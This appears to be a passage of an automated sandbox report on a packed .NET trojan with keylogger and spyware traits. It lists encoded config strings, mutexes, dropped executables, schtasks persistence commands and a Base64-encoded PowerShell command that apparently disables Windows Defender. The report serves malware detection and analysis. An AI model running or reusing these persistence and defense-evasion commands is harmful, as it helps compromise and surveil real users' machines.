Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='

Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Client.exe.0.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Client.exe.0.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Infected.exe.0.dr, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Infected.exe.0.dr, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: Infected.exe.0.dr, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: Client.exe.0.dr, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke

Source: whoami.exe, 00000028.00000002.2230637919.000001E068988000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBP

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@118/59@6/6

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Loaader.exe	Mutant created: \Sessions\1\BaseNamedObjects\i??Fe?4?z2U?wXC6Af?fUT?6
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7384
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Loader.exe	Mutant created: \Sessions\1\BaseNamedObjects\OfflineKeylogger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Loader.exe	Mutant created: \Sessions\1\BaseNamedObjects\scgofjarww
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File created: C:\Users\user\AppData\Local\Temp\Client.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Infected.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe, 00000014.00000002.2527964251.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, tmp5DD6.tmp.dat.21.dr, tmpABDC.tmp.dat.20.dr

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	ReversingLabs: Detection: 73%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Virustotal: Detection: 82%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Loaader.exe C:\Users\user\AppData\Roaming\Loaader.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Loader.exe C:\Users\user\AppData\Roaming\Loader.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANA